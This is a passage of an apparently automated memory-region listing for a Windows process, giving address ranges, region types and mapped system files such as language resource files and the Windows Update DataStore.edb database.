5858 start_va = 0xb42f830000 end_va = 0xb42f83cfff entry_point = 0xb42f830000 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 5859 start_va = 0xb42f840000 end_va = 0xb42f843fff entry_point = 0xb42f840000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 5860 start_va = 0xb42f850000 end_va = 0xb42f85cfff entry_point = 0xb42f850000 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 5861 start_va = 0xb42f860000 end_va = 0xb42f863fff entry_point = 0xb42f860000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 5862 start_va = 0xb42f870000 end_va = 0xb42f880fff entry_point = 0xb42f870000 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 5863 start_va = 0xb42f890000 end_va = 0xb42f896fff entry_point = 0x0 region_type = private name = "private_0x000000b42f890000" filename = "" Region: id = 5864 start_va = 0xb42f8a0000 end_va = 0xb42f8a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42f8a0000" filename = "" Region: id = 5865 start_va = 0xb42f8b0000 end_va = 0xb42f8b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42f8b0000" filename = "" Region: id = 5866 start_va = 0xb42f8c0000 end_va = 0xb42f8c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42f8c0000" filename = "" Region: id = 5867 start_va = 0xb42f8d0000 end_va = 0xb42f8d6fff entry_point = 0x0 region_type = private name = "private_0x000000b42f8d0000" filename = "" Region: id = 5868 start_va = 0xb42f8e0000 end_va = 0xb42f8e1fff entry_point = 0xb42f8e0000 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 5869 start_va = 0xb42f8f0000 end_va = 0xb42f8f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42f8f0000" filename = "" Region: id = 5870 start_va = 0xb42f900000 end_va = 0xb42f9fffff entry_point = 0x0 region_type = private name = "private_0x000000b42f900000" filename = "" Region: id = 5871 start_va = 0xb42fa00000 end_va = 0xb42fafffff entry_point = 0x0 region_type = private name = "private_0x000000b42fa00000" filename = "" Region: id = 5872 start_va = 0xb42fb00000 end_va = 0xb42fbfffff entry_point = 0x0 region_type = private name = "private_0x000000b42fb00000" filename = "" Region: id = 5873 start_va = 0xb42fc00000 end_va = 0xb42ff36fff entry_point = 0xb42fc00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5874 start_va = 0xb42ff40000 end_va = 0xb43003ffff entry_point = 0x0 region_type = private name = "private_0x000000b42ff40000" filename = "" Region: id = 5875 start_va = 0xb430040000 end_va = 0xb43013ffff entry_point = 0x0 region_type = private name = "private_0x000000b430040000" filename = "" Region: id = 5876 start_va = 0xb430140000 end_va = 0xb43023ffff entry_point = 0x0 region_type = private name = "private_0x000000b430140000" filename = "" Region: id = 5877 start_va = 0xb430240000 end_va = 0xb43033ffff entry_point = 0x0 region_type = private name = "private_0x000000b430240000" filename = "" Region: id = 5878 start_va = 0xb430340000 end_va = 0xb4303bffff entry_point = 0x0 region_type = private name = "private_0x000000b430340000" filename = "" Region: id = 5879 start_va = 0xb4303c0000 end_va = 0xb4303c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b4303c0000" filename = "" Region: id = 5880 start_va = 0xb4303d0000 end_va = 0xb4303d8fff entry_point = 0xb4303d0000 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 5881 start_va = 0xb4303e0000 end_va = 0xb4303e4fff entry_point = 0xb4303e0000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 5882 start_va = 0xb4303f0000 end_va = 0xb4303fffff entry_point = 0xb4303f0000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 5883 start_va = 0xb430400000 end_va = 0xb4304fffff entry_point = 0x0 region_type = private name = "private_0x000000b430400000" filename = "" Region: id = 5884 start_va = 0xb430500000 end_va = 0xb4305fffff entry_point = 0x0 region_type = private name = "private_0x000000b430500000" filename = "" Region: id = 5885 start_va = 0xb430600000 end_va = 0xb43068afff entry_point = 0xb430600000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 5886 start_va = 0xb430690000 end_va = 0xb430692fff entry_point = 0xb430690000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 5887 start_va = 0xb4306a0000 end_va = 0xb4306e0fff entry_point = 0x0 region_type = private name = "private_0x000000b4306a0000" filename = "" Region: id = 5888 start_va = 0xb4306f0000 end_va = 0xb4306fffff entry_point = 0x0 region_type = private name = "private_0x000000b4306f0000" filename = "" Region: id = 5889 start_va = 0xb430700000 end_va = 0xb4307fffff entry_point = 0x0 region_type = private name = "private_0x000000b430700000" filename = "" Region: id = 5890 start_va = 0xb430800000 end_va = 0xb4308fffff entry_point = 0x0 region_type = private name = "private_0x000000b430800000" filename = "" Region: id = 5891 start_va = 0xb430900000 end_va = 0xb43097ffff entry_point = 0x0 region_type = private name = "private_0x000000b430900000" filename = "" Region: id = 5892 start_va = 0xb430980000 end_va = 0xb4309c2fff entry_point = 0xb430980000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000013.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000013.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000013.db") Region: id = 5893 start_va = 0xb430a50000 end_va = 0xb430a50fff entry_point = 0x0 region_type = private name = "private_0x000000b430a50000" filename = "" Region: id = 5894 start_va = 0xb430a60000 end_va = 0xb430a60fff entry_point = 0x0 region_type = private name = "private_0x000000b430a60000" filename = "" Region: id = 5895 start_va = 0xb430a70000 end_va = 0xb430a73fff entry_point = 0x0 region_type = private name = "private_0x000000b430a70000" filename = "" Region: id = 5896 start_va = 0xb430a80000 end_va = 0xb430b7ffff entry_point = 0x0 region_type = private name = "private_0x000000b430a80000" filename = "" Region: id = 5897 start_va = 0xb430b80000 end_va = 0xb430c7ffff entry_point = 0x0 region_type = private name = "private_0x000000b430b80000" filename = "" Region: id = 5898 start_va = 0xb430c80000 end_va = 0xb430cfffff entry_point = 0x0 region_type = private name = "private_0x000000b430c80000" filename = "" Region: id = 5899 start_va = 0xb430d00000 end_va = 0xb430dfffff entry_point = 0x0 region_type = private name = "private_0x000000b430d00000" filename = "" Region: id = 5900 start_va = 0xb430e00000 end_va = 0xb430efffff entry_point = 0x0 region_type = private name = "private_0x000000b430e00000" filename = "" Region: id = 5901 start_va = 0xb430f00000 end_va = 0xb430ffffff entry_point = 0x0 region_type = private name = "private_0x000000b430f00000" filename = "" Region: id = 5902 start_va = 0xb431000000 end_va = 0xb4310fffff entry_point = 0x0 region_type = private name = "private_0x000000b431000000" filename = "" Region: id = 5903 start_va = 0xb431200000 end_va = 0xb4312fffff entry_point = 0x0 region_type = private name = "private_0x000000b431200000" filename = "" Region: id = 5904 start_va = 0xb431380000 end_va = 0xb43147ffff entry_point = 0x0 region_type = private name = "private_0x000000b431380000" filename = "" Region: id = 5905 start_va = 0xb431500000 end_va = 0xb4315defff entry_point = 0xb431500000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5906 start_va = 0xb4315e0000 end_va = 0xb4315e1fff entry_point = 0x0 region_type = private name = "private_0x000000b4315e0000" filename = "" Region: id = 5907 start_va = 0xb4315f0000 end_va = 0xb4315f0fff entry_point = 0x0 region_type = private name = "private_0x000000b4315f0000" filename = "" Region: id = 5908 start_va = 0xb431600000 end_va = 0xb4316fffff entry_point = 0x0 region_type = private name = "private_0x000000b431600000" filename = "" Region: id = 5909 start_va = 0xb431780000 end_va = 0xb43187ffff entry_point = 0x0 region_type = private name = "private_0x000000b431780000" filename = "" Region: id = 5910 start_va = 0xb431880000 end_va = 0xb43197ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b431880000" filename = "" Region: id = 5911 start_va = 0xb431980000 end_va = 0xb43198ffff entry_point = 0x0 region_type = private name = "private_0x000000b431980000" filename = "" Region: id = 5912 start_va = 0xb431990000 end_va = 0xb431a8ffff entry_point = 0x0 region_type = private name = "private_0x000000b431990000" filename = "" Region: id = 5913 start_va = 0xb431a90000 end_va = 0xb431a9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b431a90000" filename = "" Region: id = 5914 start_va = 0xb431aa0000 end_va = 0xb431aaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b431aa0000" filename = "" Region: id = 5915 start_va = 0xb431ab0000 end_va = 0xb431abffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b431ab0000" filename = "" Region: id = 5916 start_va = 0xb431ac0000 end_va = 0xb431acffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b431ac0000" filename = "" Region: id = 5917 start_va = 0xb431ad0000 end_va = 0xb431adffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b431ad0000" filename = "" Region: id = 5918 start_va = 0xb431ae0000 end_va = 0xb431aeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b431ae0000" filename = "" Region: id = 5919 start_va = 0xb431af0000 end_va = 0xb431af7fff entry_point = 0x0 region_type = private name = "private_0x000000b431af0000" filename = "" Region: id = 5920 start_va = 0xb431b00000 end_va = 0xb431b06fff entry_point = 0x0 region_type = private name = "private_0x000000b431b00000" filename = "" Region: id = 5921 start_va = 0xb431b10000 end_va = 0xb431c0ffff entry_point = 0x0 region_type = private name = "private_0x000000b431b10000" filename = "" Region: id = 5922 start_va = 0xb431c90000 end_va = 0xb431d8ffff entry_point = 0x0 region_type = private name = "private_0x000000b431c90000" filename = "" Region: id = 5923 start_va = 0xb431d90000 end_va = 0xb431e0ffff entry_point = 0x0 region_type = private name = "private_0x000000b431d90000" filename = "" Region: id = 5924 start_va = 0xb431e10000 end_va = 0xb431f0ffff entry_point = 0x0 region_type = private name = "private_0x000000b431e10000" filename = "" Region: id = 5925 start_va = 0xb431f10000 end_va = 0xb431f8ffff entry_point = 0x0 region_type = private name = "private_0x000000b431f10000" filename = "" Region: id = 5926 start_va = 0xb431f90000 end_va = 0xb43200ffff entry_point = 0x0 region_type = private name = "private_0x000000b431f90000" filename = "" Region: id = 5927 start_va = 0xb432010000 end_va = 0xb43208ffff entry_point = 0x0 region_type = private name = "private_0x000000b432010000" filename = "" Region: id = 5928 start_va = 0xb432090000 end_va = 0xb43210ffff entry_point = 0x0 region_type = private name = "private_0x000000b432090000" filename = "" Region: id = 5929 start_va = 0xb432110000 end_va = 0xb43220ffff entry_point = 0x0 region_type = private name = "private_0x000000b432110000" filename = "" Region: id = 5930 start_va = 0xb432210000 end_va = 0xb43230ffff entry_point = 0x0 region_type = private name = "private_0x000000b432210000" filename = "" Region: id = 5931 start_va = 0xb432310000 end_va = 0xb43240ffff entry_point = 0x0 region_type = private name = "private_0x000000b432310000" filename = "" Region: id = 5932 start_va = 0xb432410000 end_va = 0xb43248ffff entry_point = 0x0 region_type = private name = "private_0x000000b432410000" filename = "" Region: id = 5933 start_va = 0xb432490000 end_va = 0xb43258ffff entry_point = 0x0 region_type = private name = "private_0x000000b432490000" filename = "" Region: id = 5934 start_va = 0xb432590000 end_va = 0xb43268ffff entry_point = 0x0 region_type = private name = "private_0x000000b432590000" filename = "" Region: id = 5935 start_va = 0xb432690000 end_va = 0xb43278ffff entry_point = 0x0 region_type = private name = "private_0x000000b432690000" filename = "" Region: id = 5936 start_va = 0xb432790000 end_va = 0xb43288ffff entry_point = 0x0 region_type = private name = "private_0x000000b432790000" filename = "" Region: id = 5937 start_va = 0xb432890000 end_va = 0xb43290ffff entry_point = 0x0 region_type = private name = "private_0x000000b432890000" filename = "" Region: id = 5938 start_va = 0xb432910000 end_va = 0xb43295cfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b432910000" filename = "" Region: id = 5939 start_va = 0xb432960000 end_va = 0xb43296ffff entry_point = 0xb432960000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5940 start_va = 0xb432970000 end_va = 0xb432976fff entry_point = 0x0 region_type = private name = "private_0x000000b432970000" filename = "" Region: id = 5941 start_va = 0xb432980000 end_va = 0xb432a7ffff entry_point = 0x0 region_type = private name = "private_0x000000b432980000" filename = "" Region: id = 5942 start_va = 0xb432a80000 end_va = 0xb432afffff entry_point = 0x0 region_type = private name = "private_0x000000b432a80000" filename = "" Region: id = 5943 start_va = 0xb432b00000 end_va = 0xb432bfffff entry_point = 0x0 region_type = private name = "private_0x000000b432b00000" filename = "" Region: id = 5944 start_va = 0xb432c00000 end_va = 0xb432cfffff entry_point = 0x0 region_type = private name = "private_0x000000b432c00000" filename = "" Region: id = 5945 start_va = 0xb432d00000 end_va = 0xb432dfffff entry_point = 0x0 region_type = private name = "private_0x000000b432d00000" filename = "" Region: id = 5946 start_va = 0xb432e00000 end_va = 0xb432e01fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b432e00000" filename = "" Region: id = 5947 start_va = 0xb432e10000 end_va = 0xb432e1ffff entry_point = 0xb432e10000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5948 start_va = 0xb432e20000 end_va = 0xb432e2ffff entry_point = 0xb432e20000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5949 start_va = 0xb432e30000 end_va = 0xb432e3ffff entry_point = 0xb432e30000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5950 start_va = 0xb432e40000 end_va = 0xb432e4ffff entry_point = 0xb432e40000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5951 start_va = 0xb432e50000 end_va = 0xb432e5ffff entry_point = 0xb432e50000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5952 start_va = 0xb432e70000 end_va = 0xb432e7ffff entry_point = 0xb432e70000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5953 start_va = 0xb432e80000 end_va = 0xb432e8ffff entry_point = 0xb432e80000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5954 start_va = 0xb432e90000 end_va = 0xb432e9ffff entry_point = 0xb432e90000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5955 start_va = 0xb432ea0000 end_va = 0xb432eaffff entry_point = 0xb432ea0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5956 start_va = 0xb432eb0000 end_va = 0xb432ebffff entry_point = 0xb432eb0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5957 start_va = 0xb432ec0000 end_va = 0xb432ecffff entry_point = 0xb432ec0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5958 start_va = 0xb432ed0000 end_va = 0xb432edffff entry_point = 0xb432ed0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5959 start_va = 0xb432ee0000 end_va = 0xb432eeffff entry_point = 0xb432ee0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5960 start_va = 0xb432ef0000 end_va = 0xb432efffff entry_point = 0xb432ef0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5961 start_va = 0xb432f00000 end_va = 0xb432ffffff entry_point = 0x0 region_type = private name = "private_0x000000b432f00000" filename = "" Region: id = 5962 start_va = 0xb433020000 end_va = 0xb43302ffff entry_point = 0xb433020000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5963 start_va = 0xb433050000 end_va = 0xb43305ffff entry_point = 0xb433050000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5964 start_va = 0xb433060000 end_va = 0xb43306ffff entry_point = 0xb433060000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5965 start_va = 0xb433070000 end_va = 0xb43307ffff entry_point = 0xb433070000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5966 start_va = 0xb433080000 end_va = 0xb43308ffff entry_point = 0xb433080000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5967 start_va = 0xb433090000 end_va = 0xb43309ffff entry_point = 0xb433090000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5968 start_va = 0xb4330a0000 end_va = 0xb4330affff entry_point = 0xb4330a0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5969 start_va = 0xb4330b0000 end_va = 0xb4330bffff entry_point = 0xb4330b0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5970 start_va = 0xb4330c0000 end_va = 0xb4330cffff entry_point = 0xb4330c0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5971 start_va = 0xb4330d0000 end_va = 0xb4330dffff entry_point = 0xb4330d0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5972 start_va = 0xb4330e0000 end_va = 0xb4330effff entry_point = 0xb4330e0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5973 start_va = 0xb4330f0000 end_va = 0xb4330fffff entry_point = 0xb4330f0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5974 start_va = 0xb433100000 end_va = 0xb4331fffff entry_point = 0x0 region_type = private name = "private_0x000000b433100000" filename = "" Region: id = 5975 start_va = 0xb433200000 end_va = 0xb4332fffff entry_point = 0x0 region_type = private name = "private_0x000000b433200000" filename = "" Region: id = 5976 start_va = 0xb433300000 end_va = 0xb4333fffff entry_point = 0x0 region_type = private name = "private_0x000000b433300000" filename = "" Region: id = 5977 start_va = 0xb433400000 end_va = 0xb4334fffff entry_point = 0x0 region_type = private name = "private_0x000000b433400000" filename = "" Region: id = 5978 start_va = 0xb433500000 end_va = 0xb4335fffff entry_point = 0x0 region_type = private name = "private_0x000000b433500000" filename = "" Region: id = 5979 start_va = 0xb433600000 end_va = 0xb4336fffff entry_point = 0x0 region_type = private name = "private_0x000000b433600000" filename = "" Region: id = 5980 start_va = 0xb433700000 end_va = 0xb4337fffff entry_point = 0x0 region_type = private name = "private_0x000000b433700000" filename = "" Region: id = 5981 start_va = 0xb433800000 end_va = 0xb43384cfff entry_point = 0x0 region_type = private name = "private_0x000000b433800000" filename = "" Region: id = 5982 start_va = 0xb433850000 end_va = 0xb43385ffff entry_point = 0xb433850000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5983 start_va = 0xb433860000 end_va = 0xb433866fff entry_point = 0x0 region_type = private name = "private_0x000000b433860000" filename = "" Region: id = 5984 start_va = 0xb433870000 end_va = 0xb4338effff entry_point = 0x0 region_type = private name = "private_0x000000b433870000" filename = "" Region: id = 5985 start_va = 0xb4338f0000 end_va = 0xb4338f0fff entry_point = 0xb4338f0000 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 5986 start_va = 0xb433900000 end_va = 0xb4339fffff entry_point = 0x0 region_type = private name = "private_0x000000b433900000" filename = "" Region: id = 5987 start_va = 0xb433a00000 end_va = 0xb433afffff entry_point = 0x0 region_type = private name = "private_0x000000b433a00000" filename = "" Region: id = 5988 start_va = 0xb433b00000 end_va = 0xb433bfffff entry_point = 0x0 region_type = private name = "private_0x000000b433b00000" filename = "" Region: id = 5989 start_va = 0xb433c00000 end_va = 0xb433cfffff entry_point = 0x0 region_type = private name = "private_0x000000b433c00000" filename = "" Region: id = 5990 start_va = 0xb433e00000 end_va = 0xb433efffff entry_point = 0x0 region_type = private name = "private_0x000000b433e00000" filename = "" Region: id = 5991 start_va = 0xb433f00000 end_va = 0xb433ffffff entry_point = 0x0 region_type = private name = "private_0x000000b433f00000" filename = "" Region: id = 5992 start_va = 0xb434000000 end_va = 0xb43400ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b434000000" filename = "" Region: id = 5993 start_va = 0xb434010000 end_va = 0xb43401ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b434010000" filename = "" Region: id = 5994 start_va = 0xb434020000 end_va = 0xb43402ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b434020000" filename = "" Region: id = 5995 start_va = 0xb434030000 end_va = 0xb43403ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b434030000" filename = "" Region: id = 5996 start_va = 0xb434040000 end_va = 0xb43404ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b434040000" filename = "" Region: id = 5997 start_va = 0xb434050000 end_va = 0xb43405ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b434050000" filename = "" Region: id = 5998 start_va = 0xb434070000 end_va = 0xb434076fff entry_point = 0x0 region_type = private name = "private_0x000000b434070000" filename = "" Region: id = 5999 start_va = 0xb434080000 end_va = 0xb43417ffff entry_point = 0x0 region_type = private name = "private_0x000000b434080000" filename = "" Region: id = 6000 start_va = 0xb434180000 end_va = 0xb4341fffff entry_point = 0x0 region_type = private name = "private_0x000000b434180000" filename = "" Region: id = 6001 start_va = 0xb434200000 end_va = 0xb4342fffff entry_point = 0x0 region_type = private name = "private_0x000000b434200000" filename = "" Region: id = 6002 start_va = 0xb434300000 end_va = 0xb4343fffff entry_point = 0x0 region_type = private name = "private_0x000000b434300000" filename = "" Region: id = 6003 start_va = 0xb434400000 end_va = 0xb4344fffff entry_point = 0x0 region_type = private name = "private_0x000000b434400000" filename = "" Region: id = 6004 start_va = 0xb434500000 end_va = 0xb4345fffff entry_point = 0x0 region_type = private name = "private_0x000000b434500000" filename = "" Region: id = 6005 start_va = 0xb434600000 end_va = 0xb43462ffff entry_point = 0x0 region_type = private name = "private_0x000000b434600000" filename = "" Region: id = 6006 start_va = 0xb434690000 end_va = 0xb434696fff entry_point = 0x0 region_type = private name = "private_0x000000b434690000" filename = "" Region: id = 6007 start_va = 0xb434700000 end_va = 0xb4347fffff entry_point = 0x0 region_type = private name = "private_0x000000b434700000" filename = "" Region: id = 6008 start_va = 0xb434800000 end_va = 0xb4348fffff entry_point = 0x0 region_type = private name = "private_0x000000b434800000" filename = "" Region: id = 6009 start_va = 0xb434900000 end_va = 0xb4349fffff entry_point = 0x0 region_type = private name = "private_0x000000b434900000" filename = "" Region: id = 6010 start_va = 0xb434a00000 end_va = 0xb434afffff entry_point = 0x0 region_type = private name = "private_0x000000b434a00000" filename = "" Region: id = 6011 start_va = 0xb434b00000 end_va = 0xb434bfffff entry_point = 0x0 region_type = private name = "private_0x000000b434b00000" filename = "" Region: id = 6012 start_va = 0xb434c00000 end_va = 0xb435bfffff entry_point = 0x0 region_type = private name = "private_0x000000b434c00000" filename = "" Region: id = 6013 start_va = 0xb435c00000 end_va = 0xb439bfffff entry_point = 0x0 region_type = private name = "private_0x000000b435c00000" filename = "" Region: id = 6014 start_va = 0xb439c00000 end_va = 0xb43dbfffff entry_point = 0x0 region_type = private name = "private_0x000000b439c00000" filename = "" Region: id = 6015 start_va = 0xb43dc00000 end_va = 0xb43dc7ffff entry_point = 0x0 region_type = private name = "private_0x000000b43dc00000" filename = "" Region: id = 6016 start_va = 0xb43dc80000 end_va = 0xb43dc8ffff entry_point = 0x0 region_type = private name = "private_0x000000b43dc80000" filename = "" Region: id = 6017 start_va = 0xb43dc90000 end_va = 0xb43dc9ffff entry_point = 0x0 region_type = private name = "private_0x000000b43dc90000" filename = "" Region: id = 6018 start_va = 0xb43dca0000 end_va = 0xb43dcaffff entry_point = 0x0 region_type = private name = "private_0x000000b43dca0000" filename = "" Region: id = 6019 start_va = 0xb43dcb0000 end_va = 0xb43dcbffff entry_point = 0x0 region_type = private name = "private_0x000000b43dcb0000" filename = "" Region: id = 6020 start_va = 0xb43dcc0000 end_va = 0xb43dccffff entry_point = 0x0 region_type = private name = "private_0x000000b43dcc0000" filename = "" Region: id = 6021 start_va = 0xb43dcd0000 end_va = 0xb43dcd7fff entry_point = 0x0 region_type = private name = "private_0x000000b43dcd0000" filename = "" Region: id = 6022 start_va = 0xb43dce0000 end_va = 0xb43dceffff entry_point = 0x0 region_type = private name = "private_0x000000b43dce0000" filename = "" Region: id = 6023 start_va = 0xb43dcf0000 end_va = 0xb43dcf0fff entry_point = 0xb43dcf0000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" 